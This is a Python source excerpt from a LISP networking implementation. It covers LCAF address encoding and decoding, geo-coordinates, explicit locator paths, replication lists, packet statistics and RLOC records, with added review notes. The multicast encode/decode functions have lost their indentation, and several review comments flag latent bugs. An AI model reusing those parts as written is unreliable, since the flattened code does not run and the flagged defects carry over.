    def lcaf_encode_iid(self):
        """
        Encode self as an Instance-ID LCAF (type 2). Internal negative
        AFIs encode either as AFI 0 carrying the IID mask-len, or as a
        nested geo-coord LCAF.
        """
        lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
        addr_length = socket.htons(self.lcaf_length(lcaf_type))
        iid = self.instance_id
        afi = self.afi
        ml = 0
        if (afi < 0):
            if (self.afi == LISP_AFI_GEO_COORD):
                afi = LISP_AFI_LCAF
                ml = 0
            else:
                afi = 0
                ml = self.mask_len
            #endif
        #endif
        lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
        lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
        if (afi == 0): return(lcaf)
        if (self.afi == LISP_AFI_GEO_COORD):
            # Strip the just-appended AFI and splice in the geo-coord LCAF.
            lcaf = lcaf[0:-2]
            lcaf += self.address.encode_geo()
            return(lcaf)
        #endif
        lcaf += self.pack_address()
        return(lcaf)
    #enddef
    def lcaf_decode_iid(self, packet):
        #
        # Decode an Instance-ID LCAF (type 2) from 'packet' into this
        # address. Returns the remaining packet bytes on success or None on
        # any parse/length error.
        #
        packet_format = "BBBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        x, y, lcaf_type, iid_ml, length = struct.unpack(packet_format,
            packet[:format_size])
        packet = packet[format_size::]
        if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)
        packet_format = "IH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        iid, afi = struct.unpack(packet_format, packet[:format_size])
        packet = packet[format_size::]
        length = socket.ntohs(length)
        self.instance_id = socket.ntohl(iid)
        afi = socket.ntohs(afi)
        self.afi = afi
        # Inner AFI 0 with a non-zero mask-length is an IID range; mask-len
        # comes from the LCAF header in that case.
        if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
        if (afi == 0):
            self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT
        #endif
        #
        # No address encoded.
        #
        if (afi == 0): return(packet)
        #
        # Look for distinguished-name.
        #
        if (self.is_dist_name()):
            packet, self.address = lisp_decode_dist_name(packet)
            # Mask length of a dist-name is its length in bits.
            self.mask_len = len(self.address) * 8
            return(packet)
        #endif
        #
        # Only process geo-prefixes inside of an LCAF encoded Instance-ID type.
        #
        if (afi == LISP_AFI_LCAF):
            packet_format = "BBBBH"
            format_size = struct.calcsize(packet_format)
            if (len(packet) < format_size): return(None)
            rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
                struct.unpack(packet_format, packet[:format_size])
            if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
            lcaf_len = socket.ntohs(lcaf_len)
            packet = packet[format_size::]
            if (lcaf_len > len(packet)): return(None)
            geo = lisp_geo("")
            self.afi = LISP_AFI_GEO_COORD
            self.address = geo
            packet = geo.decode_geo(packet, lcaf_len, rsvd2)
            self.mask_len = self.host_mask_len()
            return(packet)
        #endif
        addr_length = self.addr_length()
        if (len(packet) < addr_length): return(None)
        packet = self.unpack_address(packet)
        return(packet)
    #enddef
#
# Multicast Info Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 9 | Rsvd2 |R|L|J| 8 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Source MaskLen| Group MaskLen |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Source/Subnet Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Group Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_sg(self, group):
lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
iid = socket.htonl(self.instance_id)
addr_length = socket.htons(self.lcaf_length(lcaf_type))
lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
0, self.mask_len, group.mask_len)
lcaf += struct.pack("H", socket.htons(self.afi))
lcaf += self.pack_address()
lcaf += struct.pack("H", socket.htons(group.afi))
lcaf += group.pack_address()
return(lcaf)
#enddef
def lcaf_decode_sg(self, packet):
packet_format = "BBBBHIHBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
x, y, lcaf_type, rsvd, length, iid, z, sml, gml = \
struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])
self.instance_id = socket.ntohl(iid)
length = socket.ntohs(length) - 8
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
self.afi = socket.ntohs(afi)
self.mask_len = sml
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = self.unpack_address(packet)
if (packet == None): return([None, None])
length -= addr_length
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
group = lisp_address(LISP_AFI_NONE, "", 0, 0)
group.afi = socket.ntohs(afi)
group.mask_len = gml
group.instance_id = self.instance_id
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = group.unpack_address(packet)
if (packet == None): return([None, None])
return([packet, group])
#enddef
    def lcaf_decode_eid(self, packet):
        #
        # Dispatch on the LCAF type of an EID-record and decode it.
        # Returns [remaining-packet, group-or-None]; group is only non-None
        # for the Multicast-Info type.
        #
        packet_format = "BBB"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])
        #
        # Do not advance packet pointer. The specific LCAF decoders will do
        # it themselves.
        #
        rsvd, flags, lcaf_type = struct.unpack(packet_format,
            packet[:format_size])
        if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
            return([self.lcaf_decode_iid(packet), None])
        elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
            packet, group = self.lcaf_decode_sg(packet)
            return([packet, group])
        elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
            packet_format = "BBBBH"
            format_size = struct.calcsize(packet_format)
            # NOTE(review): these error paths return a bare None while the
            # other branches return [None, None] — callers that unpack a
            # 2-list would raise on these returns; confirm intended.
            if (len(packet) < format_size): return(None)
            rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
                struct.unpack(packet_format, packet[:format_size])
            if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
            lcaf_len = socket.ntohs(lcaf_len)
            packet = packet[format_size::]
            if (lcaf_len > len(packet)): return(None)
            geo = lisp_geo("")
            self.instance_id = 0
            self.afi = LISP_AFI_GEO_COORD
            self.address = geo
            packet = geo.decode_geo(packet, lcaf_len, rsvd2)
            self.mask_len = self.host_mask_len()
        #endif
        return([packet, None])
    #enddef
#endclass
#
# Data structure for storing learned or configured ELPs.
#
class lisp_elp_node():
    #
    # One hop of an Explicit Locator Path: its RLOC address and the
    # probe/strict/eid policy bits, plus a marker used for display when
    # this system is the last hop of the path.
    #
    def __init__(self):
        self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.probe = False
        self.strict = False
        self.eid = False
        self.we_are_last = False
    #enddef
    def copy_elp_node(self):
        #
        # Return a copy of this ELP node.
        #
        elp_node = lisp_elp_node()
        #
        # Bug fix: copy into the node's embedded address object —
        # lisp_elp_node itself has no copy_address() method (same pattern
        # as lisp_rle_node.copy_rle_node()).
        #
        elp_node.address.copy_address(self.address)
        elp_node.probe = self.probe
        elp_node.strict = self.strict
        elp_node.eid = self.eid
        elp_node.we_are_last = self.we_are_last
        return(elp_node)
    #enddef
#endclass
class lisp_elp():
    #
    # An Explicit Locator Path: an ordered list of lisp_elp_node hops and
    # the node this system should forward to next (use_elp_node).
    #
    def __init__(self, name):
        self.elp_name = name
        self.elp_nodes = []
        self.use_elp_node = None
        self.we_are_last = False
    #enddef
    def copy_elp(self):
        #
        # Return a copy of this ELP including copies of all its nodes.
        #
        elp = lisp_elp(self.elp_name)
        elp.use_elp_node = self.use_elp_node
        elp.we_are_last = self.we_are_last
        for elp_node in self.elp_nodes:
            elp.elp_nodes.append(elp_node.copy_elp_node())
        #endfor
        return(elp)
    #enddef
    def print_elp(self, want_marker):
        #
        # Return a display string for the ELP. With want_marker, "*" flags
        # the node in use and "x" flags this system as the last hop. The
        # r/R, p/P, s/S letters show the eid/probe/strict bits.
        #
        elp_str = ""
        for elp_node in self.elp_nodes:
            use_or_last = ""
            if (want_marker):
                if (elp_node == self.use_elp_node):
                    use_or_last = "*"
                elif (elp_node.we_are_last):
                    use_or_last = "x"
                #endif
            #endif
            elp_str += "{}{}({}{}{}), ".format(use_or_last,
                elp_node.address.print_address_no_iid(),
                "r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
                "S" if elp_node.strict else "s")
        #endfor
        # Trim the trailing ", ".
        return(elp_str[0:-2] if elp_str != "" else "")
    #enddef
    def select_elp_node(self):
        #
        # Find this system's position in the ELP (by matching one of our
        # local RLOCs) and select the next hop to forward to.
        #
        # NOTE(review): after the for-loop, 'elp_node' is the leaked loop
        # variable (the matched node, or the last one iterated when no
        # match). The code below relies on that, and raises if elp_nodes
        # is empty — presumably ELPs are never configured empty; confirm.
        #
        v4, v6, device = lisp_myrlocs
        index = None
        for elp_node in self.elp_nodes:
            if (v4 and elp_node.address.is_exact_match(v4)):
                index = self.elp_nodes.index(elp_node)
                break
            #endif
            if (v6 and elp_node.address.is_exact_match(v6)):
                index = self.elp_nodes.index(elp_node)
                break
            #endif
        #endfor
        #
        # If we did not find a match, this is possibly an ITR. We need to give
        # if the first ELP node.
        #
        if (index == None):
            self.use_elp_node = self.elp_nodes[0]
            elp_node.we_are_last = False
            return
        #endif
        #
        # If we matched the last item in the ELP nodes, we are the end of the
        # path. Flag it for display purposes and return None.
        #
        if (self.elp_nodes[-1] == self.elp_nodes[index]):
            self.use_elp_node = None
            elp_node.we_are_last = True
            return
        #endif
        #
        # Return the next node after the one that matches this system.
        #
        self.use_elp_node = self.elp_nodes[index+1]
        return
    #enddef
#endclass
class lisp_geo():
    #
    # A geo-coordinate point or prefix (point + radius in km), parsed from
    # the "d-m-s-N/S-d-m-s-E/W[-alt][/radius]" string form and encoded/
    # decoded as a Geo-Coord LCAF. Internally, negative latitude means
    # North and negative longitude means East (see parse_geo_string()).
    #
    def __init__(self, name):
        self.geo_name = name
        self.latitude = 0xffffffff # Negative when North, otherwise South
        self.lat_mins = 0
        self.lat_secs = 0
        self.longitude = 0xffffffff # Negative when East, otherwise West
        self.long_mins = 0
        self.long_secs = 0
        self.altitude = -1
        self.radius = 0
    #enddef
    def copy_geo(self):
        #
        # Return a field-by-field copy of this geo entry.
        #
        geo = lisp_geo(self.geo_name)
        geo.latitude = self.latitude
        geo.lat_mins = self.lat_mins
        geo.lat_secs = self.lat_secs
        geo.longitude = self.longitude
        geo.long_mins = self.long_mins
        geo.long_secs = self.long_secs
        geo.altitude = self.altitude
        geo.radius = self.radius
        return(geo)
    #enddef
    def no_geo_altitude(self):
        # -1 is the "no altitude encoded" sentinel.
        return(self.altitude == -1)
    #enddef
    def parse_geo_string(self, geo_str):
        #
        # Parse "lat_d-lat_m-lat_s-{N|S}-lon_d-lon_m-lon_s-{E|W}[-alt]
        # [/radius]" into this object. An optional leading "[iid]" is
        # stripped. Returns True on success, False on a malformed string.
        #
        index = geo_str.find("]")
        if (index != -1): geo_str = geo_str[index+1::]
        #
        # Check if radius is specified. That is a geo-prefix and not just a
        # geo-point.
        #
        if (geo_str.find("/") != -1):
            geo_str, radius = geo_str.split("/")
            self.radius = int(radius)
        #endif
        geo_str = geo_str.split("-")
        if (len(geo_str) < 8): return(False)
        latitude = geo_str[0:4]
        longitude = geo_str[4:8]
        #
        # Get optional altitude.
        #
        if (len(geo_str) > 8): self.altitude = int(geo_str[8])
        #
        # Get latitude values. North is stored as a negative degree value.
        #
        self.latitude = int(latitude[0])
        self.lat_mins = int(latitude[1])
        self.lat_secs = int(latitude[2])
        if (latitude[3] == "N"): self.latitude = -self.latitude
        #
        # Get longitude values. East is stored as a negative degree value.
        #
        self.longitude = int(longitude[0])
        self.long_mins = int(longitude[1])
        self.long_secs = int(longitude[2])
        if (longitude[3] == "E"): self.longitude = -self.longitude
        return(True)
    #enddef
    def print_geo(self):
        #
        # Return the canonical string form, the inverse of
        # parse_geo_string().
        #
        n_or_s = "N" if self.latitude < 0 else "S"
        e_or_w = "E" if self.longitude < 0 else "W"
        geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
            self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
            self.long_mins, self.long_secs, e_or_w)
        if (self.no_geo_altitude() == False):
            geo_str += "-" + str(self.altitude)
        #endif
        #
        # Print "/<radius>" if not 0.
        #
        if (self.radius != 0): geo_str += "/{}".format(self.radius)
        return(geo_str)
    #enddef
    def geo_url(self):
        #
        # Return a Google static-map URL centered on this point.
        #
        # NOTE(review): os.getenv() returns None when the variable is
        # unset, and None.isdigit() would raise — presumably
        # LISP_GEO_ZOOM_LEVEL is always defined in deployment; confirm.
        #
        zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
        zoom = "10" if (zoom == "" or zoom.isdigit() == False) else zoom
        lat, lon = self.dms_to_decimal()
        url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
            "&markers=color:blue%7Clabel:lisp%7C{},{}" + \
            "&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat, lon,
            zoom)
        return(url)
    #enddef
    def print_geo_url(self):
        #
        # Return an html anchor for this geo entry: a direct map link for a
        # point, or an internal /lisp/geo-map link for a prefix (radius).
        #
        geo = self.print_geo()
        if (self.radius == 0):
            url = self.geo_url()
            string = "<a href='{}'>{}</a>".format(url, geo)
        else:
            url = geo.replace("/", "-")
            string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo)
        #endif
        return(string)
    #enddef
    def dms_to_decimal(self):
        #
        # Convert degrees/minutes/seconds to decimal degrees. The internal
        # sign convention is inverted here: negative stored degrees (N/E)
        # become positive decimal values.
        #
        degs, mins, secs = self.latitude, self.lat_mins, self.lat_secs
        dd = float(abs(degs))
        dd += float(mins * 60 + secs) / 3600
        if (degs > 0): dd = -dd
        dd_lat = dd
        degs, mins, secs = self.longitude, self.long_mins, self.long_secs
        dd = float(abs(degs))
        dd += float(mins * 60 + secs) / 3600
        if (degs > 0): dd = -dd
        dd_long = dd
        return((dd_lat, dd_long))
    #enddef
    def get_distance(self, geo_point):
        #
        # Return the great-circle distance in km between this entry and
        # geo_point (vincenty from the geopy package).
        #
        dd_prefix = self.dms_to_decimal()
        dd_point = geo_point.dms_to_decimal()
        distance = vincenty(dd_prefix, dd_point)
        return(distance.km)
    #enddef
    def point_in_circle(self, geo_point):
        # True when geo_point lies within this geo-prefix's radius.
        km = self.get_distance(geo_point)
        return(km <= self.radius)
    #enddef
    def encode_geo(self):
        #
        # Encode this entry as a Geo-Coord LCAF (AFI + LCAF header + 20
        # bytes of payload). Flag bits: 0x40 North, 0x20 East, 0x10
        # altitude present, 0x06 radius in km.
        #
        lcaf_afi = socket.htons(LISP_AFI_LCAF)
        geo_len = socket.htons(20 + 2)
        flags = 0
        lat = abs(self.latitude)
        # Minutes+seconds are carried as milliseconds, split into a high
        # byte and a 16-bit network-order low part.
        lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
        if (self.latitude < 0): flags |= 0x40
        lon = abs(self.longitude)
        lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
        if (self.longitude < 0): flags |= 0x20
        alt = 0
        if (self.no_geo_altitude() == False):
            alt = socket.htonl(self.altitude)
            flags |= 0x10
        #endif
        radius = socket.htons(self.radius)
        if (radius != 0): flags |= 0x06
        pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
            0, geo_len)
        pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
            socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
            socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)
        return(pkt)
    #enddef
    def decode_geo(self, packet, lcaf_len, radius_hi):
        #
        # Decode a Geo-Coord LCAF payload (the inverse of encode_geo()).
        # Returns the remaining packet bytes or None on error.
        #
        # NOTE(review): the "/ 1000" and "/ 60" below are Python 2 integer
        # divisions; under Python 3 they would produce floats.
        #
        packet_format = "BBHBBHBBHIHHH"
        format_size = struct.calcsize(packet_format)
        if (lcaf_len < format_size): return(None)
        flags, r1, uncertainty, lat, lat_hi, lat_ms, lon, lon_hi, lon_ms, \
            alt, radius, r2, afi = struct.unpack(packet_format,
            packet[:format_size])
        #
        # No nested LCAFs in Geo-Coord type.
        #
        afi = socket.ntohs(afi)
        if (afi == LISP_AFI_LCAF): return(None)
        if (flags & 0x40): lat = -lat
        self.latitude = lat
        lat_secs = ((lat_hi << 16) | socket.ntohs(lat_ms)) / 1000
        self.lat_mins = lat_secs / 60
        self.lat_secs = lat_secs % 60
        if (flags & 0x20): lon = -lon
        self.longitude = lon
        lon_secs = ((lon_hi << 16) | socket.ntohs(lon_ms)) / 1000
        self.long_mins = lon_secs / 60
        self.long_secs = lon_secs % 60
        self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
        # Flag bit 0x02 set means the radius is already in km, otherwise
        # it is carried in meters and converted.
        radius = socket.ntohs(radius)
        self.radius = radius if (flags & 0x02) else radius * 1000
        self.geo_name = None
        packet = packet[format_size::]
        if (afi != 0):
            # NOTE(review): self.rloc is not initialized in __init__ —
            # this branch works only when callers reach it on objects
            # that carry an 'rloc' attribute; confirm afi is always 0
            # for the code paths that construct lisp_geo directly.
            self.rloc.afi = afi
            packet = self.rloc.unpack_address(packet)
            self.rloc.mask_len = self.rloc.host_mask_len()
        #endif
        return(packet)
    #enddef
#endclass
#
# Structure for Replication List Entries.
#
class lisp_rle_node():
    #
    # One entry of a Replication List Entry: a replication target address,
    # its level in the replication tree, an optional NAT-translated encap
    # port, and an optional locator name.
    #
    def __init__(self):
        self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.level = 0
        self.translated_port = 0
        self.rloc_name = None
    #enddef
    def copy_rle_node(self):
        #
        # Return a copy of this RLE node.
        #
        node = lisp_rle_node()
        node.address.copy_address(self.address)
        node.level = self.level
        node.translated_port = self.translated_port
        node.rloc_name = self.rloc_name
        return(node)
    #enddef
    def store_translated_rloc(self, rloc, port):
        #
        # Record the NAT-translated RLOC address and encap port.
        #
        self.translated_port = port
        self.address.copy_address(rloc)
    #enddef
    def get_encap_keys(self):
        #
        # Return (encrypt-key, icv-key) for this RLE node's encap address,
        # or (None, None) when no key state exists.
        #
        port = str(self.translated_port) if self.translated_port else "4341"
        addr_str = self.address.print_address_no_iid() + ":" + port
        try:
            key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
            if (key): return(key.encrypt_key, key.icv_key)
        except:
            pass
        #endtry
        return(None, None)
    #enddef
#endclass
class lisp_rle():
    #
    # A Replication List Entry: the full list of replication nodes and the
    # subset (rle_forwarding_list) this system actually replicates to.
    #
    def __init__(self, name):
        self.rle_name = name
        self.rle_nodes = []
        self.rle_forwarding_list = []
    #enddef
    def copy_rle(self):
        #
        # Return a copy of this RLE, with its forwarding list rebuilt.
        #
        rle = lisp_rle(self.rle_name)
        for rle_node in self.rle_nodes:
            rle.rle_nodes.append(rle_node.copy_rle_node())
        #endfor
        rle.build_forwarding_list()
        return(rle)
    #enddef
    def print_rle(self, html, do_formatting):
        #
        # Return a display string "addr[:port](Llevel)name, ..." for all
        # RLE nodes; local addresses are shown in red, names in blue.
        #
        rle_str = ""
        for rle_node in self.rle_nodes:
            port = rle_node.translated_port
            rle_name_str = ""
            if (rle_node.rloc_name != None):
                rle_name_str = rle_node.rloc_name
                if (do_formatting): rle_name_str = blue(rle_name_str, html)
            #endif
            addr_str = rle_node.address.print_address_no_iid()
            if (rle_node.address.is_local()): addr_str = red(addr_str, html)
            rle_str += "{}{}(L{}){}, ".format(addr_str, "" if port == 0 \
                else ":" + str(port), rle_node.level,
                "" if rle_node.rloc_name == None else rle_name_str)
        #endfor
        # Trim the trailing ", ".
        return(rle_str[0:-2] if rle_str != "" else "")
    #enddef
    def build_forwarding_list(self):
        #
        # Select the replication level this system forwards to: the first
        # level greater than the level of our own (local) RLE node, or
        # level 0 when we are not in the list.
        #
        # NOTE(review): 'rle_node' is used after the loop (Python leaks
        # loop variables) — the node where the loop broke, or the last
        # node when it ran to completion; raises if rle_nodes is empty.
        #
        level = -1
        for rle_node in self.rle_nodes:
            if (level == -1):
                if (rle_node.address.is_local()): level = rle_node.level
            else:
                if (rle_node.level > level): break
            #endif
        #endfor
        level = 0 if level == -1 else rle_node.level
        #
        # Forward to all nodes at the chosen level (level 128 is also
        # included at level 0), excluding our own local addresses unless
        # running as an RTR.
        #
        self.rle_forwarding_list = []
        for rle_node in self.rle_nodes:
            if (rle_node.level == level or (level == 0 and
                rle_node.level == 128)):
                if (lisp_i_am_rtr == False and rle_node.address.is_local()):
                    addr_str = rle_node.address.print_address_no_iid()
                    lprint("Exclude local RLE RLOC {}".format(addr_str))
                    continue
                #endif
                self.rle_forwarding_list.append(rle_node)
            #endif
        #endfor
    #enddef
#endclass
class lisp_json():
    #
    # A named JSON string, stored in the global lisp_json_list and
    # validated/rendered for show output.
    #
    def __init__(self, name, string):
        self.json_name = name
        self.json_string = string
    #enddef
    def add(self):
        #
        # Insert this entry into lisp_json_list, replacing any previous
        # entry with the same name.
        #
        self.delete()
        lisp_json_list[self.json_name] = self
    #enddef
    def delete(self):
        #
        # Remove any existing entry for this name, leaving a None
        # placeholder under the name.
        #
        if (self.json_name in lisp_json_list):
            del(lisp_json_list[self.json_name])
            lisp_json_list[self.json_name] = None
        #endif
    #enddef
    def print_json(self, html):
        #
        # Return the JSON string; invalid JSON is bracketed by "***"
        # markers (shown in red for html output).
        #
        marker = "***"
        if (html): marker = red(marker, html)
        if (self.valid_json()): return(self.json_string)
        return(marker + self.json_string + marker)
    #enddef
    def valid_json(self):
        #
        # Return True when the stored string parses as JSON.
        #
        try:
            json.loads(self.json_string)
            return(True)
        except:
            return(False)
        #endtry
    #enddef
#endclass
#
# LISP forwarding stats info.
#
class lisp_stats():
    #
    # Packet/byte counters with rate computation and human-readable
    # normalization (M/B/T suffixes) for the lisp show output.
    #
    def __init__(self):
        self.packet_count = 0
        self.byte_count = 0
        self.last_rate_check = 0
        self.last_packet_count = 0
        self.last_byte_count = 0
        self.last_increment = None
    #enddef
    def increment(self, octets):
        #
        # Count one packet of 'octets' bytes and timestamp the event.
        #
        self.packet_count += 1
        self.byte_count += octets
        self.last_increment = lisp_get_timestamp()
    #enddef
    def recent_packet_sec(self):
        #
        # True when a packet was counted within the last second.
        #
        if (self.last_increment == None): return(False)
        elapsed = time.time() - self.last_increment
        return(elapsed <= 1)
    #enddef
    def recent_packet_min(self):
        #
        # True when a packet was counted within the last minute.
        #
        if (self.last_increment == None): return(False)
        elapsed = time.time() - self.last_increment
        return(elapsed <= 60)
    #enddef
    def stat_colors(self, c1, c2, html):
        #
        # Color the two counter strings by traffic recency: green-sec,
        # green-min, or unchanged.
        #
        if (self.recent_packet_sec()):
            return(green_last_sec(c1), green_last_sec(c2))
        #endif
        if (self.recent_packet_min()):
            return(green_last_min(c1), green_last_min(c2))
        #endif
        return(c1, c2)
    #enddef
    def normalize(self, count):
        #
        # Return the counter as a short string with an M (millions),
        # B (billions), or T (trillions) suffix.
        #
        count = str(count)
        digits = len(count)
        if (digits > 12):
            #
            # Bug fix: slice at the trillions boundary (10^12); the old
            # [-10:-7] slicing produced a wrong integer part and fraction.
            #
            count = count[0:-12] + "." + count[-12:-9] + "T"
            return(count)
        #endif
        if (digits > 9):
            count = count[0:-9] + "." + count[-9:-7] + "B"
            return(count)
        #endif
        if (digits > 6):
            #
            # Bug fix: keep a two-digit fraction like the B case; the old
            # code took the single character count[-6].
            #
            count = count[0:-6] + "." + count[-6:-4] + "M"
            return(count)
        #endif
        return(count)
    #enddef
    def get_stats(self, summary, html):
        #
        # Return a packet/byte count and rate display string. Rates are
        # computed over the interval since the previous call; 'summary'
        # produces a condensed html pull-down form.
        #
        last_rate = self.last_rate_check
        last_packets = self.last_packet_count
        last_bytes = self.last_byte_count
        self.last_rate_check = lisp_get_timestamp()
        self.last_packet_count = self.packet_count
        self.last_byte_count = self.byte_count
        rate_diff = self.last_rate_check - last_rate
        if (rate_diff == 0):
            packet_rate = 0
            bit_rate = 0
        else:
            packet_rate = int((self.packet_count - last_packets) / rate_diff)
            bit_rate = (self.byte_count - last_bytes) / rate_diff
            bit_rate = (bit_rate * 8) / 1000000
            bit_rate = round(bit_rate, 2)
        #endif
        #
        # Normalize and put in string form.
        #
        packets = self.normalize(self.packet_count)
        bc = self.normalize(self.byte_count)
        #
        # The summary version gives you the string above in a pull-down html
        # menu and the title string is the string below.
        #
        if (summary):
            h = "<br>" if html else ""
            packets, bc = self.stat_colors(packets, bc, html)
            title = "packet-count: {}{}byte-count: {}".format(packets, h, bc)
            stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format( \
                packet_rate, bit_rate)
            if (html != ""): stats = lisp_span(title, stats)
        else:
            prate = str(packet_rate)
            brate = str(bit_rate)
            if (html):
                packets = lisp_print_cour(packets)
                prate = lisp_print_cour(prate)
                bc = lisp_print_cour(bc)
                brate = lisp_print_cour(brate)
            #endif
            h = "<br>" if html else ", "
            stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
                "{}{}bit-rate: {} mbps").format(packets, h, prate, h, bc, h,
                brate)
        #endif
        return(stats)
    #enddef
#endclass
#
# ETR/RTR decapsulation total packet and errors stats. Anytime a lisp_packet().
# packet_error value is added, this dictionary array needs to add the key
# string.
#
#
# Each key mirrors a lisp_packet.packet_error value; each maps to its own
# independent lisp_stats counter.
#
lisp_decap_stats = {
    "good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
    "checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
    "no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
    "outer-header-error" : lisp_stats()
}
#
# This a locator record definition as defined in RFCs.
#
class lisp_rloc():
    #
    # A locator (RLOC) record as defined in the LISP RFCs: RLOC address,
    # priority/weight policy, up/down reachability state, NAT translation
    # info, optional geo/ELP/RLE/json attributes, per-RLOC stats, and
    # RLOC-probe state. On multihomed systems, a chain of lisp_rloc
    # clones (next_rloc) tracks one <device, next-hop> tuple each.
    #
    def __init__(self, recurse=True):
        self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.rloc_name = None
        self.interface = None
        self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.translated_port = 0
        self.priority = 255
        self.weight = 0
        self.mpriority = 255
        self.mweight = 0
        self.uptime = 0
        self.state = LISP_RLOC_UP_STATE
        self.last_state_change = None
        self.rle_name = None
        self.elp_name = None
        self.geo_name = None
        self.json_name = None
        self.geo = None
        self.elp = None
        self.rle = None
        self.json = None
        self.stats = lisp_stats()
        self.last_rloc_probe = None
        self.last_rloc_probe_reply = None
        self.rloc_probe_rtt = -1
        self.recent_rloc_probe_rtts = [-1, -1, -1]
        self.rloc_probe_hops = "?/?"
        self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
        self.last_rloc_probe_nonce = 0
        self.echo_nonce_capable = False
        self.map_notify_requested = False
        self.rloc_next_hop = None
        self.next_rloc = None
        if (recurse == False): return
        #
        # This is for a box with multiple egress interfaces. We create an
        # rloc chain, one for each <device, nh> tuple. So we can RLOC-probe
        # individually.
        #
        next_hops = lisp_get_default_route_next_hops()
        if (next_hops == [] or len(next_hops) == 1): return
        self.rloc_next_hop = next_hops[0]
        last = self
        for nh in next_hops[1::]:
            # NOTE(review): the lisp_rloc(False) instance is immediately
            # replaced by a deepcopy of self — the deepcopy is what ends
            # up chained; confirm the throwaway allocation is intentional.
            hop = lisp_rloc(False)
            hop = copy.deepcopy(self)
            hop.rloc_next_hop = nh
            last.next_rloc = hop
            last = hop
        #endfor
    #enddef
    def up_state(self):
        # True when this RLOC is in the up state.
        return(self.state == LISP_RLOC_UP_STATE)
    #enddef
    def unreach_state(self):
        # True when this RLOC is in the unreachable state.
        return(self.state == LISP_RLOC_UNREACH_STATE)
    #enddef
    def no_echoed_nonce_state(self):
        # True when an echoed nonce was requested but never returned.
        return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
    #enddef
    def down_state(self):
